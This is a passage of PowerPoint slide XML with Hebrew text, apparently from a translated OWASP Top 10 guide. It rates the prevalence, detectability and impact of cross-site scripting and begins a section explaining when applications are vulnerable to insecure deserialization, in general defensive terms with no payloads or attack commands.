                      <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="18000" marR="18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marL="0" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>שכיחות: 3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>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marL="0" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>יכולת גילוי: 3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" kern="1200" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        <a:ea typeface="OpenSymbol"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>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algn="ctr" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>השפעה טכנית: 2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>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algn="ctr"/>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>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1"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1260000">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>כלים ממוכנים עשויים לגלות ולנצל את כל שלושת סוגי מתקפת</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>XSS</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, וכן קיימות מסגרות פריצה הזמינות להורדה חופשית.</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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nSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx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r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>מתקפת </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>XSS</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> הינה השנייה בשכיחותה מתוך ה-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> Top 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, והיא קיימת בכמעט שני שליש מכל היישומים.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>כלים ממוכנים עשויים למצוא חלק מבעיות </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>XSS</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> בצורה ממוכנת, בייחוד בטכנולוגיות בוגרות כגון </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>PHP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>J2EE / JSP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> וכן </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ASP.NET</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ההשפעה של מתקפת </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>XSS</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> הינה מתונה</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> עבור מתקפה מסוג </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>reflected</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> ו-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>DOM XSS</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> וחמורה עבור מתקפת </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>stored XSS</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, עם הרצת קוד מרוחקת בדפדפן המשתמש, כגון גניבת נתוני הזדהות, מזהה שיחה, או העברת קוד עוין </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>לקורבן.</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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ts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx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2"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13104755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Rectangle 107"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3466100" y="3132000"/>
            <a:ext cx="3383280" cy="316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gn="r" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>האם היישום פגיע?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>יישומים וממשקי פיתוח יהיו פגיעים במידה והם </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>מבצעים פתיחה לא מאובטחת של רצץ סדרתי שסופק ע"י התוקף.</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" sz="900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>הדבר עשוי לגרום לשני סוגים עיקריים של מתקפות:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>מתקפות הקשורות לאובייקט ומבנה נתונים כאשר התוקף </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>מעדכן את הלוגיקה של היישום או משיג יכולת הפעלת קוד זדוני מרחוק במידה ונעשה שימוש ב-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>classes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> המאפשרים יכולת שינוי התנהגות היישום במהלך או לאחר תהליך פתיחה לא מאובטחת של רצף סדרתי.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>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מתקפות שיבוש מידע נפוצות, כגון מתקפות הנוגעות לבקרת גישה, כאשר מבנה המידע בשימוש אך התוכן משתנה.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>מתקפה מסוג זה עשויה להיות בשימוש ביישום עצמו עבור:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
